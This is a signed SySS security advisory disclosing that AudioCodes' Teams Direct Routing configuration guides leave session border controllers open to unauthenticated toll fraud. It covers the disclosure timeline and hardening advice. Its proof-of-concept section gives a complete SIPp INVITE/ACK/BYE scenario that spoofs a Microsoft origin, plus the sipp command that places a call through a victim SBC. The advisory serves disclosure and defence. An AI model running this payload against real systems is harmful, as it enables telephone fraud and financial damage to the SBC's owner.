-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID:               SYSS-2021-075
Product:                   AudioCodes Session Border Controller
                           Configuration Guidelines for Microsoft Teams Direct Routing
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       N.A.
Tested Version(s):         N.A.
Vulnerability Type:        Configuration (CWE-16) 
Risk Level:                High
Solution Status:           Not completely fixed; further measures are necessary
Manufacturer Notification: 2022-01-14
Solution Date:             N.A.
Public Disclosure:         2022-02-03
CVE Reference:             Not yet assigned
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The AudioCodes Session Border Controllers [1] are used for routing and 
security purposes for Voice-over-IP services such as SIP Trunks, PBX or e.g. 
Microsoft Teams.

The manufacturer describes the product as follows:

"AudioCodes’ Mediant session border controllers (SBCs) deliver seamless 
connectivity, enhanced security and quality assurance for enterprise 
and service provider VoIP networks.
In the enterprise environment, SBCs form an effective demarcation point 
between the business’s VoIP network and the service provider’s SIP trunk, 
performing SIP protocol mediation and media handling (interoperability), 
and securing the enterprise VoIP network."

In the manufacturer's configuration guide for various SIP trunk providers 
together with Microsoft Teams Direct Routing, sufficient hardening is not
described. If this configuration recommendation is followed, unauthenticated 
external attackers could commit telephone fraud and cause financial damage.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

AudioCodes provides configuration guidelines for various SIP providers 
and UC Systems in combination with Microsoft Teams Direct Routing [2].

However, if an AudioCodes Session Border Controller is configured according 
to these instructions, e.g. for the SIP provider Deutsche Telekom AG (DTAG) [3], 
it is susceptible to toll fraud. 
Due to missing authentication, an unauthenticated external attacker could, 
for example, make chargeable calls via the ITSP SIP Account through the 
AudioCodes SBC. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For a successful attack, the attacker needs to know the hostname of the SBC.
This hostname can be found out, for instance, by looking at the common name attribute 
of the certificate of the SBC's SIP-TLS service.
For the proof of concept, the same hostname is used as in the configuration 
example of DTAG (sbc.aceducation.info).

As a proof of concept, the following XML scenario template could be used
together with the open source tool SIPp [4]:


<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE scenario SYSTEM "sipp.dtd">

<scenario name="Basic Sipstone UAC">
  <send retrans="500">
    <![CDATA[

      INVITE sip:[service]@sbc.aceducation.info:[remote_port] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch]
      From: <sip:+491234@sip.pstnhub.microsoft.com:[local_port]>;tag=[pid][call_number]
      To: <sip:[service]@sbc.aceducation.info:[remote_port]>
      Call-ID: [call_id]
      CSeq: 1 INVITE
      Contact: sip:+491234@pstnhub.microsoft.com:[local_port]
      Max-Forwards: 70
      Content-Type: application/sdp
      Content-Length: [len]

      v=0
      o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip]
      s=-
      c=IN IP[media_ip_type] [media_ip]
      t=0 0
      m=audio [media_port] RTP/AVP 8
      a=rtpmap:8 PCMA/8000
      a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:QjQAOZvjh2tr4tFlOC7x78e+Y6NVWo83lHsFl7uf
      a=encryption:optional


    ]]>
  </send>

  <recv response="100"
        optional="true">
  </recv>

  <recv response="180" optional="true">
  </recv>

  <recv response="183" optional="true">
  </recv>

  <recv response="200" rtd="true">
  </recv>

  <send>
    <![CDATA[

      ACK sip:[service]@sbc.aceducation.info:[remote_port] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch]
      From: <sip:+491234@sip.pstnhub.microsoft.com:[local_port]>;tag=[pid][call_number]
      To: <sip:[service]@sbc.aceducation.info:[remote_port]>[peer_tag_param]
      Call-ID: [call_id]
      CSeq: 1 ACK
      Contact: sip:+491234@pstnhub.microsoft.com:[local_port]
      Max-Forwards: 70
      Content-Length: 0

    ]]>
  </send>

  <pause/>

  <send retrans="500">
    <![CDATA[

      BYE sip:[service]@sbc.aceducation.info:[remote_port] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch]
      From: <sip:+491234@sip.pstnhub.microsoft.com:[local_port]>;tag=[pid][call_number]
      To: <sip:[service]@aceducation.info:[remote_port]>[peer_tag_param]
      Call-ID: [call_id]
      CSeq: 2 BYE
      Contact: sip:+491234@pstnhub.microsoft.com:[local_port]
      Max-Forwards: 70
      Content-Length: 0

    ]]>
  </send>

  <recv response="200" crlf="true">
  </recv>

  <ResponseTimeRepartition value="10, 20, 30, 40, 50, 100, 150, 200"/>
  <CallLengthRepartition value="10, 50, 100, 500, 1000, 5000, 10000"/>

</scenario>


A self-signed certificate and private key is also required for 
communicating with the SBC' SIP-TLS service.

Using the proof-of-concept template with SIPp:

#> sipp sbc.aceducation.info:5061 -sf poc.xml -s +4970714078560 -m 1 -t l1 -tls_cert crt.crt -tls_key key.key

Now, a call will be initiated through the victim's SBC and the configured
ITSP SIP account to the phone number +4970714078560. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer updated the configuration guideline [5].
This document includes hardening measures, e.g. classification and firewall
policies.

Due to the manufacturer's recommended lax classification of source IP addresses, 
which allows source IPs from the network 52.0.0.0/8, the attack is still 
possible because this IP address block has not been assigned to Microsoft 
exclusively. 

In addition, even the manufacturer-recommended mutual TLS authentication 
does not protect against the exploitation of this attack since the full 
certificate chain, including the Baltimore CyberTrust Root CA, is required 
for client certificate validation. 
This Root CA is widley used and does not exclusivly sign the intermediate 
certificates used by the Teams SIP proxies. 
E.g. there are service providers that issue X.509 certificates signed by this 
RootCA.

Therefore, SySS GmbH recommends the following additional hardening measures: 

- - Allow incoming SIP packets only from Microsoft SIP proxies[7].
- - Limit the max. call duration to the maximum necessary.
- - Configure country-based call filters.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-06: Vulnerability discovered
2022-01-14: Vulnerability reported to manufacturer
2022-01-14: Confirmation of the security vulnerability by the manufacturer
2022-01-18: Updated configuration guideline released by the manufacturer
2022-01-18: Reporting three other problematic configuration guidelines to 
            the manufactruer.
2022-01-28: Reporting issues of the lax classification of IP addresses and
            trusting the Baltimore Root CA instead of certificates of the
            Microsoft SIP proxies.
2022-01-28: Manufacturer referenced the general security recommendations
            for AudioCodes SBCs [8]. Manufacturer pointed out that the 
            configuration guidelines contain only "basic" security instructions
            and are focused on interworking.
2022-02-03: Public disclosure of vulnerability
2022-02-17: Updated recommendations

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes Session Border Controller Product Site
    https://www.audiocodes.com/solutions-products/products/session-border-controllers-sbcs

[2] AudioCodes Configuration Guidelines for Microsoft Teams Direct Routing
    https://www.audiocodes.com/partners/sbc-interoperability-list

[3] Vulnerable AudioCodes Configuration Guideline for DTAG and Microsoft Teams Direct Routing
    (MD5 Hash: f704904e21d5babdde4f97cb248e65c2)  
    https://www.audiocodes.com/media/13624/mediant-sbc-for-dtag-sip-trunk-with-microsoft-teams-enterprise-model-configuration-note.pdf

[4] SIPp Website
    http://sipp.sourceforge.net/

[5] Updated AudioCodes Configuration Guideline for DTAG and Microsoft Teams Direct Routing
    (MD5 Hash: b984aacc28224e263bd128a5bceb2a1b) 
    https://www.audiocodes.com/media/13624/mediant-sbc-for-dtag-sip-trunk-with-microsoft-teams-enterprise-model-configuration-note.pdf

[6] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

[7] Microsoft Teams SIP Proxy addresses
    https://docs.microsoft.com/en-us/microsoftteams/direct-routing-plan#sip-signaling-fqdns

[8] AudioCodes general Security Recommendations:
    https://www.audiocodes.com/media/15590/sbc-gateway-recommended-security-guidelines-ver-74.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmIODasACgkQrgyb+PE0
i1O5zxAAvJQWpDteRWS39wsjuiexroMBNqMju34i7etUNQVyiQjNQWR1ukwzD1TN
0hxC7r/qr0TCyPpjg35WoEs/ZWnjifuUsKcTgTbji2dCZjcNEtZwXc/zK9PJrq13
7LBl715nK4dP6v3/1qMQbNKEUsrHIp0t6R8xl48o+A/QJl2Q/hPjcHsvDlvp+8ri
XZJRjLBn/wnaKTUKuE+C3NLu1VDX9DgE/5rCDeiZSAtOgsmgLvTmoAdGbuGPYsip
Edfe/1CQhL1Zg89mlHi6k+2mptIrp5rzkzAaCze813KdCkFgU8zv/98jzaT52kgs
dnxnMCmU/o3S7naHIKrL1fiNar/0afkm3kzUtp+jq9e07y6LujEzkc8eP07aWqN3
/H2jTqAK1fYteQSKNQE8qDxbbxeS4M55lUZGMOyxFFbq0W19jdBYqfaoh/2DMCbY
ZX+Y/EtIFqqlTdltQlVZr2eka5+ERQo4U4ip37ieMb65PlMAQvUKOYN8dZzyEUH8
o7PuSJYfob+iXkDR+sTfkuGNYxVD2yvgZjTplDGjk8lkakbtr49SbAsLN4hcPINE
VAxCGlGmPtKH+K1tzezMl0SrVZ1gNZh+NqHfa3/Rz1OpzUmQJkQXLqw670uvBtY6
Ey8dqe3LUyMkru0EVwl0LOzzDfQd0NeSDj9MylHPWnaj2/0pbYo=
=FXQH
-----END PGP SIGNATURE-----